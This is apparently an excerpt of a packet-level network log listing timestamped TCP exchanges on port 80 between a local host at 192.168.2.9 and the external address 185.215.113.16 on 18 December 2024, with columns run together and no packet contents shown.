                                                                                                                Dec 18, 2024 14:18:16.590928078 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.591064930 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.591105938 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.591730118 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.591860056 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.591921091 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.592561960 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.592674971 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.592713118 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.593343973 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.593476057 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.593517065 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.594532967 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.594547033 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.594575882 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.594979048 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.595155954 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.595197916 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.595815897 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.595994949 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.596036911 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.596785069 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.596797943 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.596831083 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.597495079 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.597718000 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.597752094 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.597790956 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.598347902 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.598419905 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.598463058 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.599230051 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.599359035 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.599396944 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.600133896 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.600450039 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.600496054 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.600814104 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.601006031 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.601043940 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.601660013 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.601763964 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.601799011 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.602427959 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.602622986 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.602660894 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.603212118 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.603349924 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.603385925 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.604064941 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.604132891 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.604166985 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.604873896 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.605098963 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.605129957 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.605776072 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.605848074 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.605879068 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.606542110 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.606699944 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.606733084 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.607337952 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.607547045 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.607583046 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.608331919 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.608344078 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.608378887 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.609076023 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.609168053 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.609204054 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.609744072 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.624777079 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.758774042 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.758867979 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.758912086 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.759149075 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.759284973 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.759412050 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.759730101 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.759783983 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.759818077 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.760452032 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.760680914 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.760735989 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.761348963 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.761506081 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.761545897 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.762136936 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.762329102 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.762367010 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.763364077 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.763669968 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.763710976 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.763863087 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.763883114 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.763916969 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.764607906 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.764669895 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.764715910 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.765403986 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.765558958 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.765611887 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.766246080 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.766259909 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.766307116 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.767050982 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.767189026 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.767225027 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.767878056 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.768105984 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.768141031 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.768728971 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.768831968 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.768872976 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.769491911 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.769613028 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.769650936 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.770314932 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.770414114 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.770459890 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.771090031 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.771265030 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.771306038 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.772124052 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.772135973 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.772200108 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.772983074 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.772994995 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.773030996 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.773700953 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.773818016 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.773849964 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.774524927 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.774669886 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.774701118 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.775353909 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.775372982 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.775409937 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.776194096 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.776407957 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.776448011 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.776947975 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.777129889 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.777177095 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.777801991 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.777914047 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.777947903 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.778650045 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.778661966 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.778692007 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.779649973 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.779660940 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.779716969 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.780157089 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.780307055 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.780349970 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.780998945 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.781137943 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.781177044 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.781822920 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.781964064 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.782002926 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.782618046 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.782783985 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.782826900 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.783551931 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.783740044 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.783782005 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.784425020 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.784508944 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.785201073 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.785231113 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.785448074 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.785485029 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.786014080 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.786138058 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.786174059 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.786782980 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.786880970 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.786920071 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.787612915 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.787729025 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.787772894 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.788439035 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.788532019 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.788568974 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.789274931 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.789414883 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.789457083 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.790091991 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.790232897 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.790266991 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.790958881 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.791079044 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.791117907 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.791810036 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.791867971 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.791907072 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.792650938 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.792747021 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.792788029 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.793354988 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.793498039 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.793540955 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.794177055 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.794311047 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.794361115 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.794984102 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.795113087 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.795146942 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.795614958 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.795845032 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.796010017 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.796049118 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.796688080 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.796755075 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.796792984 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.797492027 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.797629118 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.797672033 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.798325062 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.798443079 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.798489094 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.799118996 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.799185991 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.799227953 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.799910069 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.800057888 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.800096035 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.800749063 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.800975084 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.801024914 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.801520109 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.818099976 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.828567982 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.950848103 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.950867891 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.950930119 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.951061964 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.951128960 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.951169968 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.951857090 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.952018023 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.952056885 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.952791929 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.952804089 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.952840090 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.953548908 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.953720093 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.953752995 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.954355955 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.954514027 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.954560995 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.955161095 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.955387115 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.955429077 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.956016064 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.956135035 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.956178904 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.956804037 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.956880093 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.956919909 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.957645893 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.957705975 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.957746029 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.958422899 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.958528996 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.958584070 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.959263086 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.959358931 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.959400892 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.960130930 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.960210085 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.960247040 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.960922003 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.961035013 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.961077929 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.961776972 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.961899042 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.961937904 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.962575912 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.962621927 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.962661028 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.963391066 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.963532925 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.963573933 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.964190960 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.964345932 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.964384079 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.965020895 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.965156078 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.965203047 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.965866089 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.965951920 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.965991974 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.966634035 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.966787100 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.966823101 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.967519045 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.967588902 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.967643976 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.968343019 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.968468904 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.968513966 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.969180107 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.969373941 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.969413996 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.969985008 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.970058918 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.970098972 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.970782995 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.970881939 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.970922947 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.971569061 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.971698999 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.971734047 CET4980780192.168.2.9185.215.113.16
                                                                                                                Dec 18, 2024 14:18:16.972474098 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.972650051 CET8049807185.215.113.16192.168.2.9
                                                                                                                Dec 18, 2024 14:18:16.972697020 CET4980780192.168.2.9185.215.113.16
